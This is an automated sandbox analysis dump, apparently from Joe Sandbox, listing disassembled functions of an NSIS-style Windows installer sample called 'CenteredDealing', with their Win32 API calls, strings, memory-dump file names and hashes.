                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                                                                                • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                                                                                                                                                                                Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                                                                                                                                                                                • API String ID: 1033533793-945480824
                                                                                                                                                                                                                                                                • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                                                                                • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                                                                                                                                                                                Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                                                                                • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                                                                                                                                                                                Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 00404871
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                                                                                                • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                                                                                                                                                                                Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(0001D800,00000064,?), ref: 00403295
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                                                                                                • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                                                                                                                                                                                Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404457
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: %u.%u%s%s$@rD
                                                                                                                                                                                                                                                                • API String ID: 3540041739-1813061909
                                                                                                                                                                                                                                                                • Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                                                                                • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                                                                                                                                                                                Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                • String ID: *?|<>/":
                                                                                                                                                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                                                                                • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                                                                                                                                                                                Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                                                                                • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                                                                                                                                                                                Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                                                                                • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                                                                                                                                                                                Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
